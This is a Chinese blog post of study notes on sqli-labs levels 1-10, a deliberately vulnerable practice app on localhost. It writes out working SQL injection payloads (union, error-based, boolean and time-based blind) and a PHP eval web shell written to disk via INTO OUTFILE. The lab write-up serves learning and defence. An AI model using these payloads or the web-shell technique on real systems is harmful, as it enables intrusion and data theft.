Sqli-labs 学习笔记 Less 1-10

最新推荐文章于 2024-01-19 17:22:18 发布
最新推荐文章于 2024-01-19 17:22:18 发布
阅读量115 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57638517/article/details/116695139
版权

1.这边使用的phpstudy搭建环境,将源码复制到phpstudy目录中的www文件夹中,源码可以从github下载

这里是源码地址:https://github.com/Audi-1/sqli-labs

下图为源码文件放的位置

php版本建议5.4以上,这样没有魔术引号

下面只是单纯的爆数据库,想要爆出用户名和密码的话继续使用查询语句查询就行

Less 1

http://127.0.0.1/sqli-labs-master/Less-1/?id=1
//这里是less 1的url

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
//尝试用单引号闭合试试是否报错,这里显示报错

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+
//使用 order by 判断字段数,这边显示3个字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' union select 1,2,3 --+
//使用union联合查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() --+
//直接爆出数据库

 

Less 2

http://127.0.0.1/sqli-labs-master/Less-2/?id=1
//这里是Less 2的url

http://127.0.0.1/sqli-labs-master/Less-2/?id=1-0
//用/报错和-0显示正常判断出此处有数值型注入

http://127.0.0.1/sqli-labs-master/Less-2/?id=1-0 union select 1,2,database() --+
//一样使用union联合查询爆出数据库

Less 3

http://127.0.0.1/sqli-labs-master/Less-3/?id=1
//这里是Less 3的url

http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+
//使用单号加注释,发现还是报错

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
//这边加个括号发现回显正常,说明这里有字符型注入,判断是使用('')闭合字符串

http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,database() --+
//继续用union联合爆出数据库

Less 4

这里与第三关类型,只是单引号变成了双引号,原理是一样的

Less 5

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'
//这边用单引号发现报错,用双引号发现页面返回正常,判断是单引号闭合,用联合查询发现这里没有数据回显,所以这边使用显错注入

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
//直接爆出数据库名

Less 6

这里和第五关一样,单引号闭合变为双引号闭合,同样使用显错注入爆出数据库

Less 7

http://127.0.0.1/sqli-labs-master/Less-7/?id=1'))--+
//经过多次测试发现这里是((''))闭合字符串,因为没有报错信息所以这边用不了显错注入
我们可以尝试写入文件

这里可以用@@basedir和@@datadir查看数据库安装路径和数据库路径,接着上传一句话

union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile"路径"

通过菜刀连接

Less 8

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+
//这里发现是单引号字符型注入,这里也尝试了一些boole盲注发现也可以

http://127.0.0.1/sqli-labs-master/Less-8/?id=2' union select 1,2,3 into outfile "D:\\phpStudy\\WWW\\1.php"--+
//尝试了一下上传文件发现上传成功,说明有file权限,这样就可以上传一句话用菜刀连接了

当然还有另一种方法,这里发现boole盲注也可以,我们可以利用boole盲注一个字符一个字符爆出数据库

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8 --+
//这里通过bool盲注判断数据库名长度,这里是8

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))>115 --+
//这里是判断数据库的第一个字符ascii值是否大于115

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr(database(),1,1))=115 --+
//经过测试发现第一个字符ascii码为115,查询ascii表发现是s
以此类推可以爆出所有字符

Less 9

尝试使用单引号闭合和双引号闭合发现回显都是正常的

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) --+
//经过多次尝试这里是单引号闭合的时间盲注

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if (ascii(substr(database(),1,1))>155,1,sleep(10)) --+
//判断数据库名的第一个字符ascii值是否大于155,如果大于155,页面立即响应,反之延迟10秒后响应
这样一个一个测出数据库名

Less 10

这里和第9关差不多

http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(10)--+
//双引号闭合的时间盲注

http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and if (ascii(substr(database(),1,1))>155,1,sleep(10)) --+
//同样的判断第一个字符ascii值

 

CatFish鱼
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入及sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 593
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 740
继续学习sqli-labs,本篇是less17
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
sqli-labs通关笔记(less-1 ~ less10
weixin_44533365的博客
01-19 852
Sqli-labs是一个学习sql注入的平台,通过闯关的形式让学习的过程没有那么枯燥。个人感觉还是蛮有意思的,因此准备写一个系列来记录自己学习的过程。
sqli-labs学习笔记(1)
weixin_49248030的博客
04-22 362
sqli-labs 记录一下自己的学习,简单的做一下笔记 第一关sqli-labs前言一、sqli-labs,第一关,如何判断为字符型注入?二、通关步骤1.找到数据库2.查找表3.进入users表获得密码4.补充总结 前言 记录一下sqli-labs第一关的通过心得,不作为参考和学习资料,只求自己来时翻的时候能够看懂 一、sqli-labs,第一关,如何判断为字符型注入? 判断页面是否存在sql注入最好的方法就是在后面加上?id='1,因为无论你是字符型注入还是数值型注入页面都会返回错误。 根据页
SQLI-LABS-MASTER Less7 学习笔记
qq_27385503的博客
09-03 939
花了很长的时间才把Less7注入成功,并且连上其数据库。 环境:虚拟机VMware14+win7 64位+PHP study 这是Less 7 进入之后,输入id=1看到的结果。对于页面上显示的Yours SQL sentences are :SELECT * FROM users WHERE id=((‘1”))…..这是在源代码中加入了如下代码: 1. echo "&lt;...
Sqli-Labs(1-10)通关笔记
weixin_54894046的博客
04-02 4543
靶场环境 buuctf的靶场 来到第一关 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这关要干嘛QAQ 目标:得到数据库名字 表名 字段名 数据 输入?id=1'%23 原理用自己添加的单引号闭合 然后用#注释掉后面的单引号 不过#要用url编码成%
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 703
继续学习sqli-labs,本篇是less 32-37
sqli-labs 笔记
qq_52109950的博客
04-07 106
根据上面查询结果,就可以还原出该数据库具体结构,再根据结构信息查询出数据库存储的信息。Less-6 的闭合字符为 " ,而Less-5的闭合字符为 '然后判断字段数量,字段数为3列;能够查询出数据库名,表名,字段名,推到出数据库结构。利用ASCII 比对,一个字符一个字符比对。经过测试,发现没有报错信息,没有显示位信息。在 ' 的后多啦一个 ) 号。第四关比第三关多 "第十关 的闭合是 "
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs学习笔记(五)less 15-16 post盲注
闵行小鱼塘
09-08 570
继续学习sqli-labs,本篇是less15-16
nginx-1.24.0.tar
09-06
Nginx 1.24.0 是 Nginx 开源项目发布的一个重要更新版本,该版本在性能优化、功能增强以及安全性提升方面带来了诸多改进。当您下载 Nginx 1.24.0 的压缩包时,您将获得一个包含 Nginx 源代码的压缩文件,通常命名为 nginx-1.24.0.tar.gz(对于 GNU/Linux 和 macOS 系统)或类似的格式,具体取决于发布平台。 这个压缩包包含了编译 Nginx 服务器所需的所有源代码文件、配置文件模板(如 nginx.conf)、模块源码以及构建和安装说明。通过解压这个压缩包,您可以在支持 C 语言编译器的操作系统上编译并安装 Nginx 1.24.0。 Nginx 1.24.0 引入了一系列新特性和优化,可能包括但不限于对 HTTP/2 和 HTTP/3 协议的进一步支持、性能提升、新的模块或模块更新,以及对已知安全漏洞的修复。这使得 Nginx 能够在保持其作为高性能 HTTP 和反向代理服务器的声誉的同时,继续满足不断发展的网络需求。
智能化病虫害标注系统前端.zip
09-06
图像识别技术在病虫害检测中的应用是一个快速发展的领域,它结合了计算机视觉和机器学习算法来自动识别和分类植物上的病虫害。以下是这一技术的一些关键步骤和组成部分: 1. **数据收集**:首先需要收集大量的植物图像数据,这些数据包括健康植物的图像以及受不同病虫害影响的植物图像。 2. **图像预处理**:对收集到的图像进行处理,以提高后续分析的准确性。这可能包括调整亮度、对比度、去噪、裁剪、缩放等。 3. **特征提取**:从图像中提取有助于识别病虫害的特征。这些特征可能包括颜色、纹理、形状、边缘等。 4. **模型训练**:使用机器学习算法(如支持向量机、随机森林、卷积神经网络等)来训练模型。训练过程中,算法会学习如何根据提取的特征来识别不同的病虫害。 5. **模型验证和测试**:在独立的测试集上验证模型的性能,以确保其准确性和泛化能力。 6. **部署和应用**:将训练好的模型部署到实际的病虫害检测系统中,可以是移动应用、网页服务或集成到智能农业设备中。 7. **实时监测**:在实际应用中,系统可以实时接收植物图像,并快速给出病虫害的检测结果。 8. **持续学习**:随着时间的推移,系统可以不断学习新的病虫害样本,以提高其识别能力。 9. **用户界面**:为了方便用户使用,通常会有一个用户友好的界面,显示检测结果,并提供进一步的指导或建议。 这项技术的优势在于它可以快速、准确地识别出病虫害,甚至在早期阶段就能发现问题,从而及时采取措施。此外,它还可以减少对化学农药的依赖,支持可持续农业发展。随着技术的不断进步,图像识别在病虫害检测中的应用将越来越广泛。
Python 小游戏 (贪吃蛇、五子棋、扫雷、俄罗斯方块)
最新发布
09-06
python
MATLAB/simulink 电力系统之变压器仿真-变压器空载运行仿真,磁通饱和+励磁电流
09-06
MATLAB/simulink 电力系统之变压器仿真- 变压器空载运行仿真,磁通饱和+励磁电流
超级好的电赛习题分享.zip
09-06
电赛习题.zip
8051Proteus仿真c源码串口通讯计算器
09-06
8051Proteus仿真c源码串口通讯计算器提取方式是百度网盘分享地址
算法部署-基于ONNX+MNN+Cpp部署语音识别模型-附项目源码-优质项目实战.zip
09-06
算法部署_基于ONNX+MNN+Cpp部署语音识别模型_附项目源码_优质项目实战
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值